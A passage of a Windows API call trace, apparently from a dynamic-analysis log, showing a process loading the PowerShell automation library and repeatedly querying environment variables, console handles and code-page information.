returned 0x74 [0156.770] GetLastError () returned 0x2 [0156.771] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5dce87c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0156.771] GetLastError () returned 0x2 [0157.105] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34b778, nSize=0x80 | out: lpBuffer="") returned 0x0 [0157.105] GetLastError () returned 0xcb [0157.541] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34b778, nSize=0x80 | out: lpBuffer="") returned 0x0 [0157.541] GetLastError () returned 0xcb [0157.545] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34b778, nSize=0x80 | out: lpBuffer="") returned 0x0 [0157.545] GetLastError () returned 0xcb [0157.629] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34b778, nSize=0x80 | out: lpBuffer="") returned 0x0 [0157.629] GetLastError () returned 0xcb [0157.674] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34b778, nSize=0x80 | out: lpBuffer="") returned 0x0 [0157.674] GetLastError () returned 0xcb [0157.676] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34b778, nSize=0x80 | out: lpBuffer="") returned 0x0 [0157.676] GetLastError () returned 0xcb [0157.693] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34b778, nSize=0x80 | out: lpBuffer="") returned 0x0 [0157.693] GetLastError () returned 0xcb [0158.047] VirtualQuery (in: lpAddress=0x5dcd8cc, lpBuffer=0x5dce8cc, dwLength=0x1c | out: lpBuffer=0x5dce8cc*(BaseAddress=0x5dcd000, AllocationBase=0x5440000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0158.141] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34b778, nSize=0x80 | out: lpBuffer="") returned 0x0 [0158.141] GetLastError () returned 0xcb [0158.493] VirtualQuery (in: lpAddress=0x5dcd8cc, lpBuffer=0x5dce8cc, dwLength=0x1c | out: lpBuffer=0x5dce8cc*(BaseAddress=0x5dcd000, AllocationBase=0x5440000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0158.520] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5dcdf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0158.520] GetLastError () returned 0xcb [0158.520] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5dcdeb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0158.520] GetLastError () returned 0xcb [0158.520] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5dcdeb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0158.520] GetLastError () returned 0xcb [0158.520] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5dcdeb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0158.520] GetLastError () returned 0xcb [0158.617] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5dcdf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0158.617] GetLastError () returned 0xcb [0158.617] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5dcdeb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0158.617] GetLastError () returned 0xcb [0158.617] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5dcdeb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0158.617] GetLastError () returned 0xcb [0159.675] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0159.675] GetLastError () returned 0xcb [0159.675] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5dce410 | out: lpConsoleScreenBufferInfo=0x5dce410) returned 1 [0159.675] GetLastError () returned 0xcb [0159.703] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34b778, nSize=0x80 | out: lpBuffer="") returned 0x0 [0159.703] GetLastError () returned 0xcb [0159.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5dcdf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0159.739] GetLastError () returned 0xcb [0159.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5dcdf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0159.740] GetLastError () returned 0xcb [0159.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5dcdf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0159.740] GetLastError () returned 0xcb [0159.949] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34b778, nSize=0x80 | out: lpBuffer="") returned 0x0 [0159.949] GetLastError () returned 0xcb [0160.158] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13 [0160.166] GetLastError () returned 0xcb [0160.166] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x5dceb24 | out: lpConsoleScreenBufferInfo=0x5dceb24) returned 1 [0160.166] GetLastError () returned 0xcb [0160.183] GetConsoleOutputCP () returned 0x1b5 [0160.188] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea80, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea80) returned 0 [0160.188] GetLastError () returned 0xcb [0160.188] GetConsoleOutputCP () returned 0x1b5 [0160.188] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea80, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea80) returned 0 [0160.188] GetLastError () returned 0xcb [0160.189] GetConsoleOutputCP () returned 0x1b5 [0160.189] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.189] GetLastError () returned 0xcb [0160.189] GetConsoleOutputCP () returned 0x1b5 [0160.189] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.189] GetLastError () returned 0xcb [0160.189] GetConsoleOutputCP () returned 0x1b5 [0160.190] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.190] GetLastError () returned 0xcb [0160.190] GetConsoleOutputCP () returned 0x1b5 [0160.190] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.190] GetLastError () returned 0xcb [0160.190] GetConsoleOutputCP () returned 0x1b5 [0160.190] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.190] GetLastError () returned 0xcb [0160.190] GetConsoleOutputCP () returned 0x1b5 [0160.191] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.191] GetLastError () returned 0xcb [0160.191] GetConsoleOutputCP () returned 0x1b5 [0160.191] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.191] GetLastError () returned 0xcb [0160.191] GetConsoleOutputCP () returned 0x1b5 [0160.191] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.191] GetLastError () returned 0xcb [0160.191] GetConsoleOutputCP () returned 0x1b5 [0160.192] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.192] GetLastError () returned 0xcb [0160.192] GetConsoleOutputCP () returned 0x1b5 [0160.192] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.192] GetLastError () returned 0xcb [0160.192] GetConsoleOutputCP () returned 0x1b5 [0160.192] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.192] GetLastError () returned 0xcb [0160.193] GetConsoleOutputCP () returned 0x1b5 [0160.193] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.193] GetLastError () returned 0xcb [0160.193] GetConsoleOutputCP () returned 0x1b5 [0160.193] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.193] GetLastError () returned 0xcb [0160.193] GetConsoleOutputCP () returned 0x1b5 [0160.194] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.194] GetLastError () returned 0xcb [0160.194] GetConsoleOutputCP () returned 0x1b5 [0160.194] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.194] GetLastError () returned 0xcb [0160.194] GetConsoleOutputCP () returned 0x1b5 [0160.194] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.194] GetLastError () returned 0xcb [0160.194] GetConsoleOutputCP () returned 0x1b5 [0160.194] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.195] GetLastError () returned 0xcb [0160.195] GetConsoleOutputCP () returned 0x1b5 [0160.195] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.195] GetLastError () returned 0xcb [0160.195] GetConsoleOutputCP () returned 0x1b5 [0160.195] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.195] GetLastError () returned 0xcb [0160.195] GetConsoleOutputCP () returned 0x1b5 [0160.196] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.196] GetLastError () returned 0xcb [0160.196] GetConsoleOutputCP () returned 0x1b5 [0160.196] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.196] GetLastError () returned 0xcb [0160.196] GetConsoleOutputCP () returned 0x1b5 [0160.196] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.196] GetLastError () returned 0xcb [0160.196] GetConsoleOutputCP () returned 0x1b5 [0160.197] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.197] GetLastError () returned 0xcb [0160.197] GetConsoleOutputCP () returned 0x1b5 [0160.197] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.197] GetLastError () returned 0xcb [0160.197] GetConsoleOutputCP () returned 0x1b5 [0160.197] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.197] GetLastError () returned 0xcb [0160.197] GetConsoleOutputCP () returned 0x1b5 [0160.198] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.198] GetLastError () returned 0xcb [0160.198] GetConsoleOutputCP () returned 0x1b5 [0160.198] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.198] GetLastError () returned 0xcb [0160.198] GetConsoleOutputCP () returned 0x1b5 [0160.198] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.198] GetLastError () returned 0xcb [0160.198] GetConsoleOutputCP () returned 0x1b5 [0160.198] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.198] GetLastError () returned 0xcb [0160.199] GetConsoleOutputCP () returned 0x1b5 [0160.199] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.199] GetLastError () returned 0xcb [0160.199] GetConsoleOutputCP () returned 0x1b5 [0160.199] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.199] GetLastError () returned 0xcb [0160.199] GetConsoleOutputCP () returned 0x1b5 [0160.199] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.199] GetLastError () returned 0xcb [0160.199] GetConsoleOutputCP () returned 0x1b5 [0160.200] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.200] GetLastError () returned 0xcb [0160.200] GetConsoleOutputCP () returned 0x1b5 [0160.200] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.200] GetLastError () returned 0xcb [0160.200] GetConsoleOutputCP () returned 0x1b5 [0160.201] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.201] GetLastError () returned 0xcb [0160.201] GetConsoleOutputCP () returned 0x1b5 [0160.201] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.201] GetLastError () returned 0xcb [0160.201] GetConsoleOutputCP () returned 0x1b5 [0160.201] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.201] GetLastError () returned 0xcb [0160.201] GetConsoleOutputCP () returned 0x1b5 [0160.202] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.202] GetLastError () returned 0xcb [0160.202] GetConsoleOutputCP () returned 0x1b5 [0160.202] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.202] GetLastError () returned 0xcb [0160.202] GetConsoleOutputCP () returned 0x1b5 [0160.202] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.202] GetLastError () returned 0xcb [0160.202] GetConsoleOutputCP () returned 0x1b5 [0160.202] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.202] GetLastError () returned 0xcb [0160.202] GetConsoleOutputCP () returned 0x1b5 [0160.202] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.202] GetLastError () returned 0xcb [0160.202] GetConsoleOutputCP () returned 0x1b5 [0160.202] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.202] GetLastError () returned 0xcb [0160.202] GetConsoleOutputCP () returned 0x1b5 [0160.203] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.203] GetLastError () returned 0xcb [0160.203] GetConsoleOutputCP () returned 0x1b5 [0160.203] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.203] GetLastError () returned 0xcb [0160.203] GetConsoleOutputCP () returned 0x1b5 [0160.203] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.203] GetLastError () returned 0xcb [0160.203] GetConsoleOutputCP () returned 0x1b5 [0160.203] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.203] GetLastError () returned 0xcb [0160.203] GetConsoleOutputCP () returned 0x1b5 [0160.203] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.203] GetLastError () returned 0xcb [0160.203] GetConsoleOutputCP () returned 0x1b5 [0160.203] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.204] GetLastError () returned 0xcb [0160.204] GetConsoleOutputCP () returned 0x1b5 [0160.204] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.204] GetLastError () returned 0xcb [0160.204] GetConsoleOutputCP () returned 0x1b5 [0160.204] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.204] GetLastError () returned 0xcb [0160.204] GetConsoleOutputCP () returned 0x1b5 [0160.204] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.204] GetLastError () returned 0xcb [0160.204] GetConsoleOutputCP () returned 0x1b5 [0160.204] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.204] GetLastError () returned 0xcb [0160.204] GetConsoleOutputCP () returned 0x1b5 [0160.205] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.205] GetLastError () returned 0xcb [0160.205] GetConsoleOutputCP () returned 0x1b5 [0160.205] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.205] GetLastError () returned 0xcb [0160.205] GetConsoleOutputCP () returned 0x1b5 [0160.205] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.205] GetLastError () returned 0xcb [0160.205] GetConsoleOutputCP () returned 0x1b5 [0160.205] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.205] GetLastError () returned 0xcb [0160.205] GetConsoleOutputCP () returned 0x1b5 [0160.205] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.205] GetLastError () returned 0xcb [0160.205] GetConsoleOutputCP () returned 0x1b5 [0160.205] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.206] GetLastError () returned 0xcb [0160.206] GetConsoleOutputCP () returned 0x1b5 [0160.206] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.206] GetLastError () returned 0xcb [0160.206] GetConsoleOutputCP () returned 0x1b5 [0160.206] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.206] GetLastError () returned 0xcb [0160.206] GetConsoleOutputCP () returned 0x1b5 [0160.206] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.206] GetLastError () returned 0xcb [0160.206] GetConsoleOutputCP () returned 0x1b5 [0160.206] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.206] GetLastError () returned 0xcb [0160.206] GetConsoleOutputCP () returned 0x1b5 [0160.206] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.206] GetLastError () returned 0xcb [0160.206] GetConsoleOutputCP () returned 0x1b5 [0160.207] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.207] GetLastError () returned 0xcb [0160.207] GetConsoleOutputCP () returned 0x1b5 [0160.207] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.207] GetLastError () returned 0xcb [0160.207] GetConsoleOutputCP () returned 0x1b5 [0160.207] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.207] GetLastError () returned 0xcb [0160.207] GetConsoleOutputCP () returned 0x1b5 [0160.207] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.207] GetLastError () returned 0xcb [0160.207] GetConsoleOutputCP () returned 0x1b5 [0160.207] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.207] GetLastError () returned 0xcb [0160.207] GetConsoleOutputCP () returned 0x1b5 [0160.208] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.208] GetLastError () returned 0xcb [0160.208] GetConsoleOutputCP () returned 0x1b5 [0160.208] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.208] GetLastError () returned 0xcb [0160.208] GetConsoleOutputCP () returned 0x1b5 [0160.208] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.208] GetLastError () returned 0xcb [0160.208] GetConsoleOutputCP () returned 0x1b5 [0160.208] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.208] GetLastError () returned 0xcb [0160.208] GetConsoleOutputCP () returned 0x1b5 [0160.208] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.208] GetLastError () returned 0xcb [0160.208] GetConsoleOutputCP () returned 0x1b5 [0160.208] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.208] GetLastError () returned 0xcb [0160.208] GetConsoleOutputCP () returned 0x1b5 [0160.209] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.209] GetLastError () returned 0xcb [0160.209] GetConsoleOutputCP () returned 0x1b5 [0160.209] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, 